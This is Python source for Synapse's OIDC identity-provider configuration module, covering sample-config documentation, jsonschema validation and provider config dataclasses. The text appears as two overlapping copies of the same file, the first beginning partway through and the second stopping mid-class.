# header. Must include the key 'alg', giving the algorithm used to
# sign the JWT, such as "ES256", using the JWA identifiers in
# RFC7518.
#
# jwt_payload: an optional dictionary giving properties to include in
# the JWT payload. Normally this should include an 'iss' key.
#
# client_auth_method: auth method to use when exchanging the token. Valid
# values are 'client_secret_basic' (default), 'client_secret_post' and
# 'none'.
#
# scopes: list of scopes to request. This should normally include the "openid"
# scope. Defaults to ["openid"].
#
# authorization_endpoint: the oauth2 authorization endpoint. Required if
# provider discovery is disabled.
#
# token_endpoint: the oauth2 token endpoint. Required if provider discovery is
# disabled.
#
# userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is
# disabled and the 'openid' scope is not requested.
#
# jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and
# the 'openid' scope is used.
#
# skip_verification: set to 'true' to skip metadata verification. Use this if
# you are connecting to a provider that is not OpenID Connect compliant.
# Defaults to false. Avoid this in production.
#
# user_profile_method: Whether to fetch the user profile from the userinfo
# endpoint, or to rely on the data returned in the id_token from the
# token_endpoint.
#
# Valid values are: 'auto' or 'userinfo_endpoint'.
#
# Defaults to 'auto', which uses the userinfo endpoint if 'openid' is
# not included in 'scopes'. Set to 'userinfo_endpoint' to always use the
# userinfo endpoint.
#
# allow_existing_users: set to 'true' to allow a user logging in via OIDC to
# match a pre-existing account instead of failing. This could be used if
# switching from password logins to OIDC. Defaults to false.
#
# user_mapping_provider: Configuration for how attributes returned from a OIDC
# provider are mapped onto a matrix user. This setting has the following
# sub-properties:
#
# module: The class name of a custom mapping module. Default is
# {mapping_provider!r}.
# See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers
# for information on implementing a custom mapping provider.
#
# config: Configuration for the mapping provider module. This section will
# be passed as a Python dictionary to the user mapping provider
# module's `parse_config` method.
#
# For the default provider, the following settings are available:
#
# subject_claim: name of the claim containing a unique identifier
# for the user. Defaults to 'sub', which OpenID Connect
# compliant providers should provide.
#
# localpart_template: Jinja2 template for the localpart of the MXID.
# If this is not set, the user will be prompted to choose their
# own username (see 'sso_auth_account_details.html' in the 'sso'
# section of this file).
#
# display_name_template: Jinja2 template for the display name to set
# on first login. If unset, no displayname will be set.
#
# email_template: Jinja2 template for the email address of the user.
# If unset, no email address will be added to the account.
#
# extra_attributes: a map of Jinja2 templates for extra attributes
# to send back to the client during login.
# Note that these are non-standard and clients will ignore them
# without modifications.
#
# When rendering, the Jinja2 templates are given a 'user' variable,
# which is set to the claims returned by the UserInfo Endpoint and/or
# in the ID Token.
#
# It is possible to configure Synapse to only allow logins if certain attributes
# match particular values in the OIDC userinfo. The requirements can be listed under
# `attribute_requirements` as shown below. All of the listed attributes must
# match for the login to be permitted. Additional attributes can be added to
# userinfo by expanding the `scopes` section of the OIDC config to retrieve
# additional information from the OIDC provider.
#
# If the OIDC claim is a list, then the attribute must match any value in the list.
# Otherwise, it must exactly match the value of the claim. Using the example
# below, the `family_name` claim MUST be "Stephensson", but the `groups`
# claim MUST contain "admin".
#
# attribute_requirements:
# - attribute: family_name
# value: "Stephensson"
# - attribute: groups
# value: "admin"
#
# See https://matrix-org.github.io/synapse/latest/openid.html
# for information on how to configure these options.
#
# For backwards compatibility, it is also possible to configure a single OIDC
# provider via an 'oidc_config' setting. This is now deprecated and admins are
# advised to migrate to the 'oidc_providers' format. (When doing that migration,
# use 'oidc' for the idp_id to ensure that existing users continue to be
# recognised.)
#
oidc_providers:
# Generic example
#
#- idp_id: my_idp
# idp_name: "My OpenID provider"
# idp_icon: "mxc://example.com/mediaid"
# discover: false
# issuer: "https://accounts.example.com/"
# client_id: "provided-by-your-issuer"
# client_secret: "provided-by-your-issuer"
# client_auth_method: client_secret_post
# scopes: ["openid", "profile"]
# authorization_endpoint: "https://accounts.example.com/oauth2/auth"
# token_endpoint: "https://accounts.example.com/oauth2/token"
# userinfo_endpoint: "https://accounts.example.com/userinfo"
# jwks_uri: "https://accounts.example.com/.well-known/jwks.json"
# skip_verification: true
# user_mapping_provider:
# config:
# subject_claim: "id"
# localpart_template: "{{{{ user.login }}}}"
# display_name_template: "{{{{ user.name }}}}"
# email_template: "{{{{ user.email }}}}"
# attribute_requirements:
# - attribute: userGroup
# value: "synapseUsers"
""".format(
mapping_provider=DEFAULT_USER_MAPPING_PROVIDER
)
# jsonschema definition of the configuration settings for an oidc identity provider
OIDC_PROVIDER_CONFIG_SCHEMA = {
"type": "object",
"required": ["issuer", "client_id"],
"properties": {
"idp_id": {
"type": "string",
"minLength": 1,
# MSC2858 allows a maxlen of 255, but we prefix with "oidc-"
"maxLength": 250,
"pattern": "^[A-Za-z0-9._~-]+$",
},
"idp_name": {"type": "string"},
"idp_icon": {"type": "string"},
"idp_brand": {
"type": "string",
"minLength": 1,
"maxLength": 255,
"pattern": "^[a-z][a-z0-9_.-]*$",
},
"discover": {"type": "boolean"},
"issuer": {"type": "string"},
"client_id": {"type": "string"},
"client_secret": {"type": "string"},
"client_secret_jwt_key": {
"type": "object",
"required": ["jwt_header"],
"oneOf": [
{"required": ["key"]},
{"required": ["key_file"]},
],
"properties": {
"key": {"type": "string"},
"key_file": {"type": "string"},
"jwt_header": {
"type": "object",
"required": ["alg"],
"properties": {
"alg": {"type": "string"},
},
"additionalProperties": {"type": "string"},
},
"jwt_payload": {
"type": "object",
"additionalProperties": {"type": "string"},
},
},
},
"client_auth_method": {
"type": "string",
# the following list is the same as the keys of
# authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it
# to avoid importing authlib here.
"enum": ["client_secret_basic", "client_secret_post", "none"],
},
"scopes": {"type": "array", "items": {"type": "string"}},
"authorization_endpoint": {"type": "string"},
"token_endpoint": {"type": "string"},
"userinfo_endpoint": {"type": "string"},
"jwks_uri": {"type": "string"},
"skip_verification": {"type": "boolean"},
"user_profile_method": {
"type": "string",
"enum": ["auto", "userinfo_endpoint"],
},
"allow_existing_users": {"type": "boolean"},
"user_mapping_provider": {"type": ["object", "null"]},
"attribute_requirements": {
"type": "array",
"items": SsoAttributeRequirement.JSON_SCHEMA,
},
},
}
# the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name
OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = {
"allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}]
}
# the `oidc_providers` list can either be None (as it is in the default config), or
# a list of provider configs, each of which requires an explicit ID and name.
OIDC_PROVIDER_LIST_SCHEMA = {
"oneOf": [
{"type": "null"},
{"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA},
]
}
# the `oidc_config` setting can either be None (which it used to be in the default
# config), or an object. If an object, it is ignored unless it has an "enabled: True"
# property.
#
# It's *possible* to represent this with jsonschema, but the resultant errors aren't
# particularly clear, so we just check for either an object or a null here, and do
# additional checks in the code.
OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]}
# the top-level schema can contain an "oidc_config" and/or an "oidc_providers".
MAIN_CONFIG_SCHEMA = {
"type": "object",
"properties": {
"oidc_config": OIDC_CONFIG_SCHEMA,
"oidc_providers": OIDC_PROVIDER_LIST_SCHEMA,
},
}
def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]:
"""extract and parse the OIDC provider configs from the config dict
The configuration may contain either a single `oidc_config` object with an
`enabled: True` property, or a list of provider configurations under
`oidc_providers`, *or both*.
Returns a generator which yields the OidcProviderConfig objects
"""
validate_config(MAIN_CONFIG_SCHEMA, config, ())
for i, p in enumerate(config.get("oidc_providers") or []):
yield _parse_oidc_config_dict(p, ("oidc_providers", "<item %i>" % (i,)))
# for backwards-compatibility, it is also possible to provide a single "oidc_config"
# object with an "enabled: True" property.
oidc_config = config.get("oidc_config")
if oidc_config and oidc_config.get("enabled", False):
# MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that
# it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on OIDC_CONFIG_SCHEMA
# above), so now we need to validate it.
validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, oidc_config, ("oidc_config",))
yield _parse_oidc_config_dict(oidc_config, ("oidc_config",))
def _parse_oidc_config_dict(
oidc_config: JsonDict, config_path: Tuple[str, ...]
) -> "OidcProviderConfig":
"""Take the configuration dict and parse it into an OidcProviderConfig
Raises:
ConfigError if the configuration is malformed.
"""
ump_config = oidc_config.get("user_mapping_provider", {})
ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER)
if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER:
ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER
ump_config.setdefault("config", {})
(
user_mapping_provider_class,
user_mapping_provider_config,
) = load_module(ump_config, config_path + ("user_mapping_provider",))
# Ensure loaded user mapping module has defined all necessary methods
required_methods = [
"get_remote_user_id",
"map_user_attributes",
]
missing_methods = [
method
for method in required_methods
if not hasattr(user_mapping_provider_class, method)
]
if missing_methods:
raise ConfigError(
"Class %s is missing required "
"methods: %s"
% (
user_mapping_provider_class,
", ".join(missing_methods),
),
config_path + ("user_mapping_provider", "module"),
)
idp_id = oidc_config.get("idp_id", "oidc")
# prefix the given IDP with a prefix specific to the SSO mechanism, to avoid
# clashes with other mechs (such as SAML, CAS).
#
# We allow "oidc" as an exception so that people migrating from old-style
# "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to
# a new-style "oidc_providers" entry without changing the idp_id for their provider
# (and thereby invalidating their user_external_ids data).
if idp_id != "oidc":
idp_id = "oidc-" + idp_id
# MSC2858 also specifies that the idp_icon must be a valid MXC uri
idp_icon = oidc_config.get("idp_icon")
if idp_icon is not None:
try:
parse_and_validate_mxc_uri(idp_icon)
except ValueError as e:
raise ConfigError(
"idp_icon must be a valid MXC URI", config_path + ("idp_icon",)
) from e
client_secret_jwt_key_config = oidc_config.get("client_secret_jwt_key")
client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None
if client_secret_jwt_key_config is not None:
keyfile = client_secret_jwt_key_config.get("key_file")
if keyfile:
key = read_file(keyfile, config_path + ("client_secret_jwt_key",))
else:
key = client_secret_jwt_key_config["key"]
client_secret_jwt_key = OidcProviderClientSecretJwtKey(
key=key,
jwt_header=client_secret_jwt_key_config["jwt_header"],
jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}),
)
# parse attribute_requirements from config (list of dicts) into a list of SsoAttributeRequirement
attribute_requirements = [
SsoAttributeRequirement(**x)
for x in oidc_config.get("attribute_requirements", [])
]
return OidcProviderConfig(
idp_id=idp_id,
idp_name=oidc_config.get("idp_name", "OIDC"),
idp_icon=idp_icon,
idp_brand=oidc_config.get("idp_brand"),
discover=oidc_config.get("discover", True),
issuer=oidc_config["issuer"],
client_id=oidc_config["client_id"],
client_secret=oidc_config.get("client_secret"),
client_secret_jwt_key=client_secret_jwt_key,
client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"),
scopes=oidc_config.get("scopes", ["openid"]),
authorization_endpoint=oidc_config.get("authorization_endpoint"),
token_endpoint=oidc_config.get("token_endpoint"),
userinfo_endpoint=oidc_config.get("userinfo_endpoint"),
jwks_uri=oidc_config.get("jwks_uri"),
skip_verification=oidc_config.get("skip_verification", False),
user_profile_method=oidc_config.get("user_profile_method", "auto"),
allow_existing_users=oidc_config.get("allow_existing_users", False),
user_mapping_provider_class=user_mapping_provider_class,
user_mapping_provider_config=user_mapping_provider_config,
attribute_requirements=attribute_requirements,
)
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderClientSecretJwtKey:
# a pem-encoded signing key
key: str
# properties to include in the JWT header
jwt_header: Mapping[str, str]
# properties to include in the JWT payload.
jwt_payload: Mapping[str, str]
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderConfig:
# a unique identifier for this identity provider. Used in the 'user_external_ids'
# table, as well as the query/path parameter used in the login protocol.
idp_id: str
# user-facing name for this identity provider.
idp_name: str
# Optional MXC URI for icon for this IdP.
idp_icon: Optional[str]
# Optional brand identifier for this IdP.
idp_brand: Optional[str]
# whether the OIDC discovery mechanism is used to discover endpoints
discover: bool
# the OIDC issuer. Used to validate tokens and (if discovery is enabled) to
# discover the provider's endpoints.
issuer: str
# oauth2 client id to use
client_id: str
# oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate
# a secret.
client_secret: Optional[str]
# key to use to construct a JWT to use as a client secret. May be `None` if
# `client_secret` is set.
client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey]
# auth method to use when exchanging the token.
# Valid values are 'client_secret_basic', 'client_secret_post' and
# 'none'.
client_auth_method: str
# list of scopes to request
scopes: Collection[str]
# the oauth2 authorization endpoint. Required if discovery is disabled.
authorization_endpoint: Optional[str]
# the oauth2 token endpoint. Required if discovery is disabled.
token_endpoint: Optional[str]
# the OIDC userinfo endpoint. Required if discovery is disabled and the
# "openid" scope is not requested.
userinfo_endpoint: Optional[str]
# URI where to fetch the JWKS. Required if discovery is disabled and the
# "openid" scope is used.
jwks_uri: Optional[str]
# Whether to skip metadata verification
skip_verification: bool
# Whether to fetch the user profile from the userinfo endpoint. Valid
# values are: "auto" or "userinfo_endpoint".
user_profile_method: str
# whether to allow a user logging in via OIDC to match a pre-existing account
# instead of failing
allow_existing_users: bool
# the class of the user mapping provider
user_mapping_provider_class: Type
# the config of the user mapping provider
user_mapping_provider_config: Any
# required attributes to require in userinfo to allow login/registration
attribute_requirements: List[SsoAttributeRequirement]
| # Copyright 2020 Quentin Gliech
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import Counter
from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type
import attr
from synapse.config._util import validate_config
from synapse.config.sso import SsoAttributeRequirement
from synapse.types import JsonDict
from synapse.util.module_loader import load_module
from synapse.util.stringutils import parse_and_validate_mxc_uri
from ..util.check_dependencies import DependencyException, check_requirements
from ._base import Config, ConfigError, read_file
DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider"
# The module that JinjaOidcMappingProvider is in was renamed, we want to
# transparently handle both the same.
LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider"
class OIDCConfig(Config):
section = "oidc"
def read_config(self, config, **kwargs) -> None:
self.oidc_providers = tuple(_parse_oidc_provider_configs(config))
if not self.oidc_providers:
return
try:
check_requirements("oidc")
except DependencyException as e:
raise ConfigError(
e.message # noqa: B306, DependencyException.message is a property
) from e
# check we don't have any duplicate idp_ids now. (The SSO handler will also
# check for duplicates when the REST listeners get registered, but that happens
# after synapse has forked so doesn't give nice errors.)
c = Counter([i.idp_id for i in self.oidc_providers])
for idp_id, count in c.items():
if count > 1:
raise ConfigError(
"Multiple OIDC providers have the idp_id %r." % idp_id
)
public_baseurl = self.root.server.public_baseurl
self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback"
@property
def oidc_enabled(self) -> bool:
# OIDC is enabled if we have a provider
return bool(self.oidc_providers)
def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str:
return """\
# List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration
# and login.
#
# Options for each entry include:
#
# idp_id: a unique identifier for this identity provider. Used internally
# by Synapse; should be a single word such as 'github'.
#
# Note that, if this is changed, users authenticating via that provider
# will no longer be recognised as the same user!
#
# (Use "oidc" here if you are migrating from an old "oidc_config"
# configuration.)
#
# idp_name: A user-facing name for this identity provider, which is used to
# offer the user a choice of login mechanisms.
#
# idp_icon: An optional icon for this identity provider, which is presented
# by clients and Synapse's own IdP picker page. If given, must be an
# MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to
# obtain such an MXC URI is to upload an image to an (unencrypted) room
# and then copy the "url" from the source of the event.)
#
# idp_brand: An optional brand for this identity provider, allowing clients
# to style the login flow according to the identity provider in question.
# See the spec for possible options here.
#
# discover: set to 'false' to disable the use of the OIDC discovery mechanism
# to discover endpoints. Defaults to true.
#
# issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery
# is enabled) to discover the provider's endpoints.
#
# client_id: Required. oauth2 client id to use.
#
# client_secret: oauth2 client secret to use. May be omitted if
# client_secret_jwt_key is given, or if client_auth_method is 'none'.
#
# client_secret_jwt_key: Alternative to client_secret: details of a key used
# to create a JSON Web Token to be used as an OAuth2 client secret. If
# given, must be a dictionary with the following properties:
#
# key: a pem-encoded signing key. Must be a suitable key for the
# algorithm specified. Required unless 'key_file' is given.
#
# key_file: the path to file containing a pem-encoded signing key file.
# Required unless 'key' is given.
#
# jwt_header: a dictionary giving properties to include in the JWT
# header. Must include the key 'alg', giving the algorithm used to
# sign the JWT, such as "ES256", using the JWA identifiers in
# RFC7518.
#
# jwt_payload: an optional dictionary giving properties to include in
# the JWT payload. Normally this should include an 'iss' key.
#
# client_auth_method: auth method to use when exchanging the token. Valid
# values are 'client_secret_basic' (default), 'client_secret_post' and
# 'none'.
#
# scopes: list of scopes to request. This should normally include the "openid"
# scope. Defaults to ["openid"].
#
# authorization_endpoint: the oauth2 authorization endpoint. Required if
# provider discovery is disabled.
#
# token_endpoint: the oauth2 token endpoint. Required if provider discovery is
# disabled.
#
# userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is
# disabled and the 'openid' scope is not requested.
#
# jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and
# the 'openid' scope is used.
#
# skip_verification: set to 'true' to skip metadata verification. Use this if
# you are connecting to a provider that is not OpenID Connect compliant.
# Defaults to false. Avoid this in production.
#
# user_profile_method: Whether to fetch the user profile from the userinfo
# endpoint, or to rely on the data returned in the id_token from the
# token_endpoint.
#
# Valid values are: 'auto' or 'userinfo_endpoint'.
#
# Defaults to 'auto', which uses the userinfo endpoint if 'openid' is
# not included in 'scopes'. Set to 'userinfo_endpoint' to always use the
# userinfo endpoint.
#
# allow_existing_users: set to 'true' to allow a user logging in via OIDC to
# match a pre-existing account instead of failing. This could be used if
# switching from password logins to OIDC. Defaults to false.
#
# user_mapping_provider: Configuration for how attributes returned from a OIDC
# provider are mapped onto a matrix user. This setting has the following
# sub-properties:
#
# module: The class name of a custom mapping module. Default is
# {mapping_provider!r}.
# See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers
# for information on implementing a custom mapping provider.
#
# config: Configuration for the mapping provider module. This section will
# be passed as a Python dictionary to the user mapping provider
# module's `parse_config` method.
#
# For the default provider, the following settings are available:
#
# subject_claim: name of the claim containing a unique identifier
# for the user. Defaults to 'sub', which OpenID Connect
# compliant providers should provide.
#
# localpart_template: Jinja2 template for the localpart of the MXID.
# If this is not set, the user will be prompted to choose their
# own username (see 'sso_auth_account_details.html' in the 'sso'
# section of this file).
#
# display_name_template: Jinja2 template for the display name to set
# on first login. If unset, no displayname will be set.
#
# email_template: Jinja2 template for the email address of the user.
# If unset, no email address will be added to the account.
#
# extra_attributes: a map of Jinja2 templates for extra attributes
# to send back to the client during login.
# Note that these are non-standard and clients will ignore them
# without modifications.
#
# When rendering, the Jinja2 templates are given a 'user' variable,
# which is set to the claims returned by the UserInfo Endpoint and/or
# in the ID Token.
#
# It is possible to configure Synapse to only allow logins if certain attributes
# match particular values in the OIDC userinfo. The requirements can be listed under
# `attribute_requirements` as shown below. All of the listed attributes must
# match for the login to be permitted. Additional attributes can be added to
# userinfo by expanding the `scopes` section of the OIDC config to retrieve
# additional information from the OIDC provider.
#
# If the OIDC claim is a list, then the attribute must match any value in the list.
# Otherwise, it must exactly match the value of the claim. Using the example
# below, the `family_name` claim MUST be "Stephensson", but the `groups`
# claim MUST contain "admin".
#
# attribute_requirements:
# - attribute: family_name
# value: "Stephensson"
# - attribute: groups
# value: "admin"
#
# See https://matrix-org.github.io/synapse/latest/openid.html
# for information on how to configure these options.
#
# For backwards compatibility, it is also possible to configure a single OIDC
# provider via an 'oidc_config' setting. This is now deprecated and admins are
# advised to migrate to the 'oidc_providers' format. (When doing that migration,
# use 'oidc' for the idp_id to ensure that existing users continue to be
# recognised.)
#
oidc_providers:
# Generic example
#
#- idp_id: my_idp
# idp_name: "My OpenID provider"
# idp_icon: "mxc://example.com/mediaid"
# discover: false
# issuer: "https://accounts.example.com/"
# client_id: "provided-by-your-issuer"
# client_secret: "provided-by-your-issuer"
# client_auth_method: client_secret_post
# scopes: ["openid", "profile"]
# authorization_endpoint: "https://accounts.example.com/oauth2/auth"
# token_endpoint: "https://accounts.example.com/oauth2/token"
# userinfo_endpoint: "https://accounts.example.com/userinfo"
# jwks_uri: "https://accounts.example.com/.well-known/jwks.json"
# skip_verification: true
# user_mapping_provider:
# config:
# subject_claim: "id"
# localpart_template: "{{{{ user.login }}}}"
# display_name_template: "{{{{ user.name }}}}"
# email_template: "{{{{ user.email }}}}"
# attribute_requirements:
# - attribute: userGroup
# value: "synapseUsers"
""".format(
mapping_provider=DEFAULT_USER_MAPPING_PROVIDER
)
# jsonschema definition of the configuration settings for an oidc identity provider
OIDC_PROVIDER_CONFIG_SCHEMA = {
"type": "object",
"required": ["issuer", "client_id"],
"properties": {
"idp_id": {
"type": "string",
"minLength": 1,
# MSC2858 allows a maxlen of 255, but we prefix with "oidc-"
"maxLength": 250,
"pattern": "^[A-Za-z0-9._~-]+$",
},
"idp_name": {"type": "string"},
"idp_icon": {"type": "string"},
"idp_brand": {
"type": "string",
"minLength": 1,
"maxLength": 255,
"pattern": "^[a-z][a-z0-9_.-]*$",
},
"discover": {"type": "boolean"},
"issuer": {"type": "string"},
"client_id": {"type": "string"},
"client_secret": {"type": "string"},
"client_secret_jwt_key": {
"type": "object",
"required": ["jwt_header"],
"oneOf": [
{"required": ["key"]},
{"required": ["key_file"]},
],
"properties": {
"key": {"type": "string"},
"key_file": {"type": "string"},
"jwt_header": {
"type": "object",
"required": ["alg"],
"properties": {
"alg": {"type": "string"},
},
"additionalProperties": {"type": "string"},
},
"jwt_payload": {
"type": "object",
"additionalProperties": {"type": "string"},
},
},
},
"client_auth_method": {
"type": "string",
# the following list is the same as the keys of
# authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it
# to avoid importing authlib here.
"enum": ["client_secret_basic", "client_secret_post", "none"],
},
"scopes": {"type": "array", "items": {"type": "string"}},
"authorization_endpoint": {"type": "string"},
"token_endpoint": {"type": "string"},
"userinfo_endpoint": {"type": "string"},
"jwks_uri": {"type": "string"},
"skip_verification": {"type": "boolean"},
"user_profile_method": {
"type": "string",
"enum": ["auto", "userinfo_endpoint"],
},
"allow_existing_users": {"type": "boolean"},
"user_mapping_provider": {"type": ["object", "null"]},
"attribute_requirements": {
"type": "array",
"items": SsoAttributeRequirement.JSON_SCHEMA,
},
},
}
# the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name
OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = {
"allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}]
}
# the `oidc_providers` list can either be None (as it is in the default config), or
# a list of provider configs, each of which requires an explicit ID and name.
OIDC_PROVIDER_LIST_SCHEMA = {
"oneOf": [
{"type": "null"},
{"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA},
]
}
# the `oidc_config` setting can either be None (which it used to be in the default
# config), or an object. If an object, it is ignored unless it has an "enabled: True"
# property.
#
# It's *possible* to represent this with jsonschema, but the resultant errors aren't
# particularly clear, so we just check for either an object or a null here, and do
# additional checks in the code.
OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]}
# the top-level schema can contain an "oidc_config" and/or an "oidc_providers".
MAIN_CONFIG_SCHEMA = {
"type": "object",
"properties": {
"oidc_config": OIDC_CONFIG_SCHEMA,
"oidc_providers": OIDC_PROVIDER_LIST_SCHEMA,
},
}
def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]:
"""extract and parse the OIDC provider configs from the config dict
The configuration may contain either a single `oidc_config` object with an
`enabled: True` property, or a list of provider configurations under
`oidc_providers`, *or both*.
Returns a generator which yields the OidcProviderConfig objects
"""
validate_config(MAIN_CONFIG_SCHEMA, config, ())
for i, p in enumerate(config.get("oidc_providers") or []):
yield _parse_oidc_config_dict(p, ("oidc_providers", "<item %i>" % (i,)))
# for backwards-compatibility, it is also possible to provide a single "oidc_config"
# object with an "enabled: True" property.
oidc_config = config.get("oidc_config")
if oidc_config and oidc_config.get("enabled", False):
# MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that
# it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on OIDC_CONFIG_SCHEMA
# above), so now we need to validate it.
validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, oidc_config, ("oidc_config",))
yield _parse_oidc_config_dict(oidc_config, ("oidc_config",))
def _parse_oidc_config_dict(
oidc_config: JsonDict, config_path: Tuple[str, ...]
) -> "OidcProviderConfig":
"""Take the configuration dict and parse it into an OidcProviderConfig
Raises:
ConfigError if the configuration is malformed.
"""
ump_config = oidc_config.get("user_mapping_provider", {})
ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER)
if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER:
ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER
ump_config.setdefault("config", {})
(
user_mapping_provider_class,
user_mapping_provider_config,
) = load_module(ump_config, config_path + ("user_mapping_provider",))
# Ensure loaded user mapping module has defined all necessary methods
required_methods = [
"get_remote_user_id",
"map_user_attributes",
]
missing_methods = [
method
for method in required_methods
if not hasattr(user_mapping_provider_class, method)
]
if missing_methods:
raise ConfigError(
"Class %s is missing required "
"methods: %s"
% (
user_mapping_provider_class,
", ".join(missing_methods),
),
config_path + ("user_mapping_provider", "module"),
)
idp_id = oidc_config.get("idp_id", "oidc")
# prefix the given IDP with a prefix specific to the SSO mechanism, to avoid
# clashes with other mechs (such as SAML, CAS).
#
# We allow "oidc" as an exception so that people migrating from old-style
# "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to
# a new-style "oidc_providers" entry without changing the idp_id for their provider
# (and thereby invalidating their user_external_ids data).
if idp_id != "oidc":
idp_id = "oidc-" + idp_id
# MSC2858 also specifies that the idp_icon must be a valid MXC uri
idp_icon = oidc_config.get("idp_icon")
if idp_icon is not None:
try:
parse_and_validate_mxc_uri(idp_icon)
except ValueError as e:
raise ConfigError(
"idp_icon must be a valid MXC URI", config_path + ("idp_icon",)
) from e
client_secret_jwt_key_config = oidc_config.get("client_secret_jwt_key")
client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None
if client_secret_jwt_key_config is not None:
keyfile = client_secret_jwt_key_config.get("key_file")
if keyfile:
key = read_file(keyfile, config_path + ("client_secret_jwt_key",))
else:
key = client_secret_jwt_key_config["key"]
client_secret_jwt_key = OidcProviderClientSecretJwtKey(
key=key,
jwt_header=client_secret_jwt_key_config["jwt_header"],
jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}),
)
# parse attribute_requirements from config (list of dicts) into a list of SsoAttributeRequirement
attribute_requirements = [
SsoAttributeRequirement(**x)
for x in oidc_config.get("attribute_requirements", [])
]
return OidcProviderConfig(
idp_id=idp_id,
idp_name=oidc_config.get("idp_name", "OIDC"),
idp_icon=idp_icon,
idp_brand=oidc_config.get("idp_brand"),
discover=oidc_config.get("discover", True),
issuer=oidc_config["issuer"],
client_id=oidc_config["client_id"],
client_secret=oidc_config.get("client_secret"),
client_secret_jwt_key=client_secret_jwt_key,
client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"),
scopes=oidc_config.get("scopes", ["openid"]),
authorization_endpoint=oidc_config.get("authorization_endpoint"),
token_endpoint=oidc_config.get("token_endpoint"),
userinfo_endpoint=oidc_config.get("userinfo_endpoint"),
jwks_uri=oidc_config.get("jwks_uri"),
skip_verification=oidc_config.get("skip_verification", False),
user_profile_method=oidc_config.get("user_profile_method", "auto"),
allow_existing_users=oidc_config.get("allow_existing_users", False),
user_mapping_provider_class=user_mapping_provider_class,
user_mapping_provider_config=user_mapping_provider_config,
attribute_requirements=attribute_requirements,
)
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderClientSecretJwtKey:
# a pem-encoded signing key
key: str
# properties to include in the JWT header
jwt_header: Mapping[str, str]
# properties to include in the JWT payload.
jwt_payload: Mapping[str, str]
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderConfig:
# a unique identifier for this identity provider. Used in the 'user_external_ids'
# table, as well as the query/path parameter used in the login protocol.
idp_id: str
# user-facing name for this identity provider.
idp_name: str
# Optional MXC URI for icon for this IdP.
idp_icon: Optional[str]
# Optional brand identifier for this IdP.
idp_brand: Optional[str]
# whether the OIDC discovery mechanism is used to discover endpoints
discover: bool
# the OIDC issuer. Used to validate tokens and (if discovery is enabled) to
# discover the provider's endpoints.
issuer: str
# oauth2 client id to use
client_id: str
# oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate
# a secret.
client_secret: Optional[str]
# key to use to construct a JWT to use as a client secret. May be `None` if
# `client_secret` is set.
client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey]
# auth method to use when exchanging the token.
# Valid values are 'client_secret_basic', 'client_secret_post' and
# 'none'.
client_auth_method: str
# list of scopes to request
scopes: Collection[str]
# the oauth2 authorization endpoint. Required if discovery is disabled.
